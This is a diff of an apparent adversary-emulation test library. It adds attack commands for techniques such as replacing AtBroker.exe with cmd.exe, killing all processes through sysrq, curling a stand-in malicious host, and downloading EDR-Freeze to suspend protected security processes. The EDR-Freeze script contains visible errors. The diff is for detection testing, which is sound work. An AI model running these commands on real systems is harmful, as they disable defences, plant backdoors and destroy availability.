@@ -18,6 +18,8 @@ In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/
 
 - [Atomic Test #2 - At - Schedule a job](#atomic-test-2---at---schedule-a-job)
 
+- [Atomic Test #3 - At - Schedule a job via kubectl in a Pod](#atomic-test-3---at---schedule-a-job-via-kubectl-in-a-pod)
+
 
 <br/>
 
@@ -104,4 +106,53 @@ echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `syste
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - At - Schedule a job via kubectl in a Pod
+Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+and submits a job with `at`. The pod is deleted after execution.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_name | Name of the image | string | ubuntu|
+| pod_name | K8s pod name to execute the command in | string | atomic-at-schedule|
+| time_spec | Time specification of when the command should run | string | now + 1 minute|
+| at_command | The command to be run | string | echo Hello from Atomic Red Team|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo '#{at_command}' | at #{time_spec} && at -l"
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed manually"
+```
+
+
+
+
 <br/>

atomics/T1053.002/T1053.002.yaml

@@ -54,3 +54,38 @@ atomic_tests:
     elevation_required: false
     command: |-
       echo "#{at_command}" | at #{time_spec}
+- name: At - Schedule a job via kubectl in a Pod
+  auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+  description: |
+    Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+    and submits a job with `at`. The pod is deleted after execution.
+  supported_platforms:
+  - containers
+  input_arguments:
+    image_name:
+      description: Name of the image
+      type: string
+      default: ubuntu
+    pod_name:
+      description: K8s pod name to execute the command in
+      type: string
+      default: atomic-at-schedule
+    time_spec:
+      description: Time specification of when the command should run
+      type: string
+      default: now + 1 minute
+    at_command:
+      description: The command to be run
+      type: string
+      default: echo Hello from Atomic Red Team
+  dependencies:
+  - description: kubectl must be installed and configured
+    get_prereq_command: |
+      echo "kubectl must be installed manually"
+    prereq_command: |
+      which kubectl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo '#{at_command}' | at #{time_spec} && at -l"

atomics/T1083/T1083.md

@@ -26,6 +26,8 @@ Some files and directories may require elevated or specific user permissions to
 
 - [Atomic Test #7 - ESXi - Enumerate VMDKs available on an ESXi Host](#atomic-test-7---esxi---enumerate-vmdks-available-on-an-esxi-host)
 
+- [Atomic Test #8 - Identifying Network Shares - Linux](#atomic-test-8---identifying-network-shares---linux)
+
 
 <br/>
 
@@ -344,4 +346,33 @@ Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -O
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Identifying Network Shares - Linux
+If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 361fe49d-0c19-46ec-a483-ccb92d38e88e
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+findmnt -t nfs
+```
+
+
+
+
+
+
 <br/>

atomics/T1083/T1083.yaml

@@ -191,3 +191,14 @@ atomic_tests:
        echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
     name: command_prompt
     elevation_required: false
+- name: Identifying Network Shares - Linux
+  auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+  description: |
+    If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+    Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      findmnt -t nfs
+    name: sh

atomics/T1105/T1105.md

@@ -90,6 +90,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o
 
 - [Atomic Test #38 - Download a file with OneDrive Standalone Updater](#atomic-test-38---download-a-file-with-onedrive-standalone-updater)
 
+- [Atomic Test #39 - Curl Insecure Connection from a Pod](#atomic-test-39---curl-insecure-connection-from-a-pod)
+
 
 <br/>
 
@@ -1950,4 +1952,52 @@ Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #39 - Curl Insecure Connection from a Pod
+Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+against a target URL. The pod is automatically deleted after execution.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pod_name | K8s pod_name to execute the command in | string | atomic-insecure-curl|
+| remote_url | Remote URL to curl | string | https://malicious-apt.com|
+| image_name | Name of the docker image | string | curlimages/curl|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed manually"
+```
+
+
+
+
 <br/>

atomics/T1105/T1105.yaml

@@ -1268,4 +1268,35 @@ atomic_tests:
       Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
 
     name: powershell
-    elevation_required: false
+    elevation_required: false
+- name: Curl Insecure Connection from a Pod
+  auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+  description: |
+    Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+    against a target URL. The pod is automatically deleted after execution.
+  supported_platforms:
+  - containers
+  input_arguments:
+    pod_name:
+      description: K8s pod_name to execute the command in
+      type: string
+      default: atomic-insecure-curl
+    remote_url:
+      description: Remote URL to curl
+      type: string
+      default: https://malicious-apt.com
+    image_name:
+      description: Name of the docker image
+      type: string
+      default: curlimages/curl
+  dependencies:
+  - description: kubectl must be installed and configured
+    get_prereq_command: |
+      echo "kubectl must be installed manually"
+    prereq_command: |
+      which kubectl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}

atomics/T1136.001/T1136.001.md

@@ -30,6 +30,8 @@ Such accounts may be used to establish secondary credentialed access that do not
 
 - [Atomic Test #9 - Create a new Windows admin user via .NET](#atomic-test-9---create-a-new-windows-admin-user-via-net)
 
+- [Atomic Test #10 - Create a Linux user via kubectl in a Pod](#atomic-test-10---create-a-linux-user-via-kubectl-in-a-pod)
+
 
 <br/>
 
@@ -369,4 +371,52 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - Create a Linux user via kubectl in a Pod
+Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+The pod is automatically deleted after execution.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pod_name | K8s pod_name to execute the command in | string | atomic-linux-useradd|
+| username | Username of the user to create inside the pod | string | evil_user|
+| image_name | Name of the docker image | string | alpine|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed manually"
+```
+
+
+
+
 <br/>

atomics/T1136.001/T1136.001.yaml

@@ -185,3 +185,34 @@ atomic_tests:
     command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
     name: powershell
     elevation_required: true
+- name: Create a Linux user via kubectl in a Pod
+  auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+  description: |
+    Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+    The pod is automatically deleted after execution.
+  supported_platforms:
+  - containers
+  input_arguments:
+    pod_name:
+      description: K8s pod_name to execute the command in
+      type: string
+      default: atomic-linux-useradd
+    username:
+      description: Username of the user to create inside the pod
+      type: string
+      default: evil_user
+    image_name:
+      description: Name of the docker image
+      type: string
+      default: alpine
+  dependencies:
+  - description: kubectl must be installed and configured
+    get_prereq_command: |
+      echo "kubectl must be installed manually"
+    prereq_command: |
+      which kubectl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'

atomics/T1140/T1140.md

@@ -32,6 +32,8 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp
 
 - [Atomic Test #10 - XOR decoding and command execution using Python](#atomic-test-10---xor-decoding-and-command-execution-using-python)
 
+- [Atomic Test #11 - Expand CAB with expand.exe](#atomic-test-11---expand-cab-with-expandexe)
+
 
 <br/>
 
@@ -498,4 +500,50 @@ echo "Install Python3"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #11 - Expand CAB with expand.exe
+Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
+Upon success, art-expand-source.txt is extracted next to the CAB.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cab_path | Path to the CAB to expand (created if missing) | path | %TEMP%&#92;art-expand-test.cab|
+| output_dir | Destination directory | path | %TEMP%&#92;art-expand-out|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+mkdir "#{output_dir}" >nul 2>&1
+echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
+makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
+pushd "#{output_dir}"
+expand "#{cab_path}" -F:* .
+popd
+```
+
+#### Cleanup Commands:
+```cmd
+del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
+del "#{cab_path}" >nul 2>&1
+rmdir "#{output_dir}" /s /q >nul 2>&1
+```
+
+
+
+
+
 <br/>

atomics/T1140/T1140.yaml

@@ -300,5 +300,35 @@ atomic_tests:
     cleanup_command: 
     name: bash
     elevation_required: false
+- name: Expand CAB with expand.exe
+  auto_generated_guid: 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
+  description: |
+    Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
+    Upon success, art-expand-source.txt is extracted next to the CAB.
+  supported_platforms:
+  - windows
+  input_arguments:
+    cab_path:
+      description: Path to the CAB to expand (created if missing)
+      type: path
+      default: '%TEMP%\art-expand-test.cab'
+    output_dir:
+      description: Destination directory
+      type: path
+      default: '%TEMP%\art-expand-out'
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      mkdir "#{output_dir}" >nul 2>&1
+      echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
+      makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
+      pushd "#{output_dir}"
+      expand "#{cab_path}" -F:* .
+      popd
+    cleanup_command: |
+      del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
+      del "#{cab_path}" >nul 2>&1
+      rmdir "#{output_dir}" /s /q >nul 2>&1
       
 

atomics/T1195.002/T1195.002.md

@@ -0,0 +1,62 @@
+# T1195.002 - Compromise Software Supply Chain
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1195/002)
+<blockquote>
+
+Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
+
+Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  
+
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Simulate npm package installation on a Linux system](#atomic-test-1---simulate-npm-package-installation-on-a-linux-system)
+
+
+<br/>
+
+## Atomic Test #1 - Simulate npm package installation on a Linux system
+Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency confusion) from within a container. The pod is deleted after execution.
+
+**Supported Platforms:** Containers, Linux
+
+
+**auto_generated_guid:** a9604672-cd46-493b-b58f-fd4124c22dd3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_name | Name of the image | string | node:18|
+| pod_name | Name of the pod | string | atomic-npm-install|
+| package_name | NPM package to install | string | tinycolor|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed"
+```
+
+
+
+
+<br/>

atomics/T1195.002/T1195.002.yaml

@@ -0,0 +1,32 @@
+attack_technique: T1195.002
+display_name: Compromise Software Supply Chain
+atomic_tests:
+- name: Simulate npm package installation on a Linux system
+  auto_generated_guid: a9604672-cd46-493b-b58f-fd4124c22dd3
+  description: |
+    Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency confusion) from within a container. The pod is deleted after execution.
+  supported_platforms:
+    - containers
+    - linux
+  input_arguments:
+    image_name:
+      description: Name of the image
+      type: string
+      default: node:18
+    pod_name:
+      description: Name of the pod
+      type: string
+      default: atomic-npm-install
+    package_name:
+      description: NPM package to install
+      type: string
+      default: tinycolor
+  dependencies:
+    - description: kubectl must be installed and configured
+      get_prereq_command: echo "kubectl must be installed"
+      prereq_command: which kubectl
+  executor:
+      name: bash
+      elevation_required: false
+      command: |
+        kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"

atomics/T1489/T1489.md

@@ -24,6 +24,8 @@ Adversaries may accomplish this by disabling individual services of high importa
 
 - [Atomic Test #7 - Linux - Stop service by killing process using pkill](#atomic-test-7---linux---stop-service-by-killing-process-using-pkill)
 
+- [Atomic Test #8 - Abuse of linux magic system request key for Send a SIGTERM to all processes](#atomic-test-8---abuse-of-linux-magic-system-request-key-for-send-a-sigterm-to-all-processes)
+
 
 <br/>
 
@@ -299,4 +301,32 @@ sudo systemctl start #{service_name} 2> /dev/null
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Abuse of linux magic system request key for Send a SIGTERM to all processes
+Adversaries with root or sufficient privileges Send a SIGTERM to all processes, except for init. By writing 'e' to /proc/sysrq-trigger, they can forced kill all processes, except for init.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+echo "e" > /proc/sysrq-trigger
+```
+
+
+
+
+
+
 <br/>

atomics/T1489/T1489.yaml

@@ -153,3 +153,14 @@ atomic_tests:
       sudo systemctl start #{service_name} 2> /dev/null
     name: sh
     elevation_required: true
+- name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+  auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+  description: |
+    Adversaries with root or sufficient privileges Send a SIGTERM to all processes, except for init. By writing 'e' to /proc/sysrq-trigger, they can forced kill all processes, except for init.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      echo "e" > /proc/sysrq-trigger
+    name: bash
+    elevation_required: true

atomics/T1491.001/T1491.001.md

@@ -289,14 +289,14 @@ catch {
 
 
 
-#### Dependencies:  Run with `powershell`!
+#### Dependencies:  Run with `command_prompt`!
 ##### Description: Notepad must be present on the system
 ##### Check Prereq Commands:
-```powershell
+```cmd
 where notepad
 ```
 ##### Get Prereq Commands:
-```powershell
+```cmd
 
 ```
 

atomics/T1491.001/T1491.001.yaml

@@ -184,9 +184,9 @@ atomic_tests:
           - notepad.exe launched with a ransom-themed text file
           - creation of a ransom-themed text file in %TEMP%
         NON-DESTRUCTIVE Atomic Red Team test.
+  dependency_executor_name: command_prompt
   dependencies:
     - description: Notepad must be present on the system
-      dependency_executor_name: command_prompt
       prereq_command: "where notepad"
       get_prereq_command: ""
   executor:

atomics/T1546.008/T1546.008.md

@@ -40,6 +40,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi
 
 - [Atomic Test #9 - Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe](#atomic-test-9---replace-displayswitchexe-display-switcher-binary-with-cmdexe)
 
+- [Atomic Test #10 - Replace AtBroker.exe (App Switcher binary) with cmd.exe](#atomic-test-10---replace-atbrokerexe-app-switcher-binary-with-cmdexe)
+
 
 <br/>
 
@@ -390,4 +392,39 @@ copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\Display
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - Replace AtBroker.exe (App Switcher binary) with cmd.exe
+Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 210be7ea-d841-40ec-b3e1-ff610bb62744
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+takeown /F C:\Windows\System32\AtBroker.exe /A
+icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+```
+
+#### Cleanup Commands:
+```cmd
+copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+```
+
+
+
+
+
 <br/>

atomics/T1546.008/T1546.008.yaml

@@ -185,3 +185,19 @@ atomic_tests:
       copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
     name: command_prompt
     elevation_required: true
+- name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+  auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+  description: |
+    Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+      takeown /F C:\Windows\System32\AtBroker.exe /A
+      icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+    name: command_prompt
+    elevation_required: true

atomics/T1553.001/T1553.001.md

@@ -45,11 +45,11 @@ Gatekeeper Bypass via command line
 | app_path | Path to app to be used | path | myapp.app|
 
 
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `sh`! 
 
 
 ```sh
-sudo xattr -d com.apple.quarantine #{app_path}
+xattr -d com.apple.quarantine #{app_path}
 ```
 
 

atomics/T1553.001/T1553.001.yaml

@@ -14,6 +14,5 @@ atomic_tests:
       default: myapp.app
   executor:
     command: |
-      sudo xattr -d com.apple.quarantine #{app_path}
-    elevation_required: true
+      xattr -d com.apple.quarantine #{app_path}
     name: sh

atomics/T1562.001/T1562.001.md

@@ -134,6 +134,10 @@ Additionally, adversaries may exploit legitimate drivers from anti-virus softwar
 
 - [Atomic Test #57 - Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57---disable-eventlog-application-etw-provider-via-registry---powershell)
 
+- [Atomic Test #58 - Freeze PPL-protected process with EDR-Freeze](#atomic-test-58---freeze-ppl-protected-process-with-edr-freeze)
+
+- [Atomic Test #59 - Disable ASLR Via sysctl parameters - Linux](#atomic-test-59---disable-aslr-via-sysctl-parameters---linux)
+
 
 <br/>
 
@@ -2436,4 +2440,214 @@ New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Ev
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #58 - Freeze PPL-protected process with EDR-Freeze
+This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cbb2573a-a6ad-4c87-aef8-6e175598559b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| processName | PPL-protected process name to target | string | SecurityHealthService|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Enable SeDebugPrivilege
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class TokenAdjuster {
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
+
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
+
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
+        ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);
+
+    [StructLayout(LayoutKind.Sequential, Pack = 1)]
+    public struct TOKEN_PRIVILEGES {
+        public int PrivilegeCount;
+        public long Luid;
+        public int Attributes;
+    }
+
+    public const int SE_PRIVILEGE_ENABLED = 0x00000002;
+    public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
+    public const uint TOKEN_QUERY = 0x0008;
+
+    public static bool EnableSeDebugPrivilege() {
+        IntPtr hToken;
+        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
+            return false;
+
+        long luid;
+        if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
+            return false;
+
+        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
+        tp.PrivilegeCount = 1;
+        tp.Luid = luid;
+        tp.Attributes = SE_PRIVILEGE_ENABLED;
+
+        return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
+    }
+}
+"@
+
+$result = [TokenAdjuster]::EnableSeDebugPrivilege()
+if ($result) {
+    Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
+} else {
+    Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
+    exit 1
+}
+
+# Get basic process info
+$process = Get-Process -Name $#{processName} -ErrorAction Stop
+$processName = $process.ProcessName
+Write-Host "Process Name: $processName)"
+Write-Host "PID: $($process.Id)"
+        
+# Get executable path and user info
+$query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
+$wmiProcess = Get-WmiObject -Query $query
+
+$owner = $wmiProcess.GetOwner()
+    Write-Host "User: $($owner.Domain)\$($owner.User)"
+
+
+# Get the folder of the current script
+$scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
+
+# Download latest EDR-Freeze package and extract (force replace)
+$downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
+$zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
+Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
+try {
+    Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
+    Write-Host "Download completed: $zipPath" -ForegroundColor Green
+    $extractFolder = $scriptFolder
+    if (Test-Path $zipPath) {
+        Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
+        if (Test-Path $extractFolder) {
+            # Ensure target exe not locked; attempt to stop any running instance silently
+            Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
+        }
+        Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
+        # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
+        $archive = $null
+        try {
+            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
+            foreach ($entry in $archive.Entries) {
+                if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
+                if ($entry.FullName.EndsWith('/')) { # directory entry
+                    $dirPath = Join-Path $extractFolder $entry.FullName
+                    if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
+                    continue
+                }
+                $destPath = Join-Path $extractFolder $entry.FullName
+                $destDir = Split-Path $destPath -Parent
+                if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
+                if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
+                try {
+                    # Use static extension method (PowerShell 5.1 compatible)
+                    [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
+                } catch {
+                    Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
+                }
+            }
+            Write-Host "Extraction completed." -ForegroundColor Green
+        } finally {
+            if ($archive) { $archive.Dispose() }
+        }
+    }
+} catch {
+    Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
+}
+
+# Wait 15s before putting targeted process before putting it in the comma
+Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 5
+Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 5
+Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 3
+Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 2
+
+# Put targeted  process in the comma for 15s
+# Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
+$edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
+    Sort-Object LastWriteTime -Descending |
+    Select-Object -First 1 -ExpandProperty Name
+if (-not $edrFreezeExeName) {
+    Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
+    exit 1
+}
+
+$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
+Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
+Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
+Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
